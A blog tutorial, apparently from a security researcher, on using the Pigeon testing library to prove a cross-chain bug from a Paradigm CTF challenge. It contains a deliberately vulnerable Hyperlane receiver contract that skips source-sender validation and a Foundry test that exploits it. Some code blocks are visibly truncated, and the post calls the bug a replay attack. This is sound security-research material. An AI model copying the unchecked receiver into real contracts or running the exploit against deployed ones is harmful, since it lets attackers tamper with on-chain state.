Writing Cross-Chain PoC Using Pigeon
May 12th, 2024

Cross-chain communication has become crucial to blockchain development, enabling interoperability and unlocking new decentralized applications (dApps) possibilities. However, due to the complexity of cross-chain interactions, security vulnerabilities and bugs can easily creep in. This blog post explores how the Pigeon library can efficiently help developers identify proof-of-concept (PoC) cross-chain bugs.

Understanding Cross-Chain Vulnerabilities

Before diving into the Pigeon library, let's briefly discuss the vulnerabilities that can arise in cross-chain scenarios. Some common issues include:

  1. Replay Attacks: Malicious actors can attempt to replay legitimate cross-chain messages, leading to unintended consequences or double-spending.

  2. Message Tampering: Attackers may try to modify the contents of cross-chain messages, altering the dApp's intended behavior.

  3. Insufficient Validation: Inadequate validation of incoming cross-chain messages can allow attackers to inject malicious data or exploit edge cases.

  4. Synchronization Issues: Discrepancies in the timing or order of cross-chain messages can lead to inconsistencies and potential vulnerabilities.

These are just a few developers' challenges when building cross-chain applications. Identifying and mitigating such vulnerabilities is crucial to ensure the security and integrity of dApps.

Introducing the Pigeon Library

The Pigeon library is an open-source testing toolkit designed specifically for cross-chain application development and testing. It provides a set of helper contracts and utilities that simulate cross-chain transactions and interactions, enabling developers and security researchers to test dApps in a forked mainnet environment.

With Pigeon, you can:

  • Simulate cross-chain transactions as close to mainnet behavior as possible.

  • Simulate the off-chain infrastructure of Arbitrary Message Bridges (AMBs) like LayerZero, Hyperlane, and Wormhole.

By leveraging the Pigeon library, developers can proactively identify PoC cross-chain bugs before deploying their dApps to production.

Using Pigeon to PoC Cross-Chain Bugs

Let's walk through an example of using Pigeon to PoC, a potential replay attack vulnerability in a cross-chain scenario.

Step 1: Set up the Testing Environment

First, ensure you have the Pigeon library installed in your Foundry project. You can install it using the following command:

forge install exp-table/pigeon

Don't forget to add the necessary remappings to your remappings.txt file.

Step 2: Create the Victim Contract

Secondly, let’s create a vulnerable contract to test our PoC. This contract validates if the msg.sender is Hyperlane Mailbox, but fails to check the source chain sender, allowing anyone to update value. This is the cross-chain problem of Paradigm CTF 2023, and I solved it in less than 15 minutes.

contract VulnerableContract {
    uint256 public value;
    IMailbox public constant mailbox = IMailbox(0x35231d4c2D8B8ADcB5617A638A0c4548684c7C70);

    /// @dev this contract is vulnerable here, it don't validate the sender
    function handle(uint32, bytes32, bytes calldata _message) external {
        require(msg.sender == address(mailbox));
        value = abi.decode(_message, (uint256));

Step 3: Write the PoC Test

Create a new Solidity test file (e.g., CrossChainBugPoc.t.sol) and import the required dependencies:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "pigeon/hyperlane/HyperlaneHelper.sol";

Next, define the CrossChainBugPoc contract that inherits from the Test Contract:

contract CrossChainBugPoc is Test {
    HyperlaneHelper public hyperlaneHelper;
    VulnerableContract public vulnerableContract;

    address usualCaller = address(42);
    address maliciousCaller = address(420);

    uint256 public L1_FORK_ID;
    uint256 public L2_FORK_ID;

    uint32 constant L1_DOMAIN = 1;
    uint32 constant L2_DOMAIN = 137;

    address public constant L1_HLMailbox = 0x35231d4c2D8B8ADcB5617A638A0c4548684c7C70;
    address public constant L2_HLMailbox = 0x35231d4c2D8B8ADcB5617A638A0c4548684c7C70;

    function setUp() public {
        L2_FORK_ID = vm.createFork("https://polygon-rpc.com");
        vulnerableContract = new VulnerableContract();

        L1_FORK_ID = vm.createSelectFork("https://eth.llamarpc.com");
        hyperlaneHelper = new HyperlaneHelper();

    // ... PoC test functions ...

In the setUp function, we create an instance of the HyperlaneHelper contract and deploy the VulnerableContract that we'll be testing.

Step 3: Simulate Cross-Chain Transactions

Now, let's write a test function to simulate a replay attack:

function testInvalidSenderAttack() public {
        // Record logs on the source chain

            L2_DOMAIN, bytes32(uint256(uint160(address(vulnerableContract)))), abi.encode(uint256(100_000_000))

        // Simulate the first cross-chain message transfer
        hyperlaneHelper.help(L1_HLMailbox, L2_HLMailbox, L2_FORK_ID, vm.getRecordedLogs());

        // Check the state on the destination chain
        assertEq(VulnerableContract(vulnerableContract).value(), 100_000_000);

        // Now a hacker tries to set the value to zero again
            L2_DOMAIN, bytes32(uint256(uint160(address(vulnerableContract)))), abi.encode(uint256(0))

        // Simulate the first cross-chain message transfer
        hyperlaneHelper.help(L1_HLMailbox, L2_HLMailbox, L2_FORK_ID, vm.getRecordedLogs());

        // Check the state on the destination chain
        assertEq(VulnerableContract(vulnerableContract).value(), 0);

In this test function, we perform the following steps:

  1. Record the logs on the source chain (L1) when the sendCrossChainMessage function is called on the VulnerableContract.

  2. Simulate the first cross-chain message transfer using the help function from the HyperlaneHelper contract, passing the necessary parameters.

  3. Check the state on the destination chain (L2) to ensure the message is processed correctly.

  4. Simulate the attack by sending a message to the vulnerable contract by a malicious actor to rest the value

  5. Check if the value variable was updated again, indicating a successful replay attack.

Step 5: Run the PoC Test

forge test --match-test testInvalidSenderAttack -vvvvv

If the test passes, it means the PoC successfully demonstrated the replay attack vulnerability in the VulnerableContract. The test output will show that the value variable was updated twice, indicating that anyone can update a state variable cross-chain due to a lack of validations.

Find the entire testing repository here:


By leveraging the Pigeon library, developers can effectively PoC cross-chain bugs and vulnerabilities in their dApps. The library provides a set of helper contracts and utilities that simulate cross-chain transactions and interactions, enabling thorough testing and validation.

The example above demonstrated how to use Pigeon to PoC, but a vulnerable contract lacks a cross-chain sender validation attack vulnerability. Pigeon also supports other commonly used message bridges and strives to support more down the road.

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